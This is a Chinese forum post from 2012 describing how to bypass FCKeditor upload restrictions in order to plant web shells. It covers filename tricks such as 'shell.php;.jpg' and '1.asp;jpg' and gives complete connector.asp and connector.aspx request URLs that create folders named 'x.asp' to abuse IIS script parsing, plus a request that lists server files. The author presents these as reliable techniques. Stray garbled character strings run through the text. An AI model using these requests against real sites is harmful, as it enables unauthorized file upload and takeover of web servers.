很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg% W/ h: J. T: G R, U* n- j1 v
8 A/ [3 a% u6 S" U; @
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。" d0 q% T; Z5 w/ F. r8 p
9 x* o# C r6 s" E继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。9 p/ x6 l: T$ G# _5 y
$ Y- G3 H. m) G Q突破建立文件夹:# J3 z/ n2 r K' Z4 r
5 Y8 {2 s+ d* V M& v' leditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp3 q* d4 w- F# b, W) v
7 o* {: N% _* u* N, I& N! `7 p
参数:8 T; @8 u8 o( r6 a9 c9 H! O( H) L
8 X$ c) X' ~" u$ {1 J1 w+ @
当前目录名:CurrentFolder=/qing.asp
' }9 m# t: y& k: \2 O# A; ^9 d+ O- w# L$ c- u& \, @
新的目录名:NewFolderName=x.asp
7 Y% D, p- n1 X1 n6 N
- [# j5 d$ L! ], y其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……/ [+ @7 b& v2 a5 g2 B
; P- L! o$ I W& Z那么 x.asp 就已经建立生成了,此方法百试百灵!6 W, M5 y( k( [
# C3 r/ w( D% X/ q) B5 o+ e5 {新建文件夹参数 x.asp,基本都能搞定。 D# R6 k+ X$ H1 P1 A- ~2 X6 k
! p0 v* N# f4 F W# A下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建$ ]7 O5 ]8 A0 X
8 k9 v/ w! S! ^! A9 m, [# n0 B! w
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
$ X% |! w+ r8 G' I6 J8 x- o9 l) F3 T) W6 I5 ?; ]/ s) r" J6 S
获取文件列表4 A9 w. `- O: L8 k6 e3 N9 D
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
' k9 x$ w) P+ Y) m) D2 w' `$ ^- ]/ k
|
发表于 2012-12-31 09:27:09
收藏
支持
反对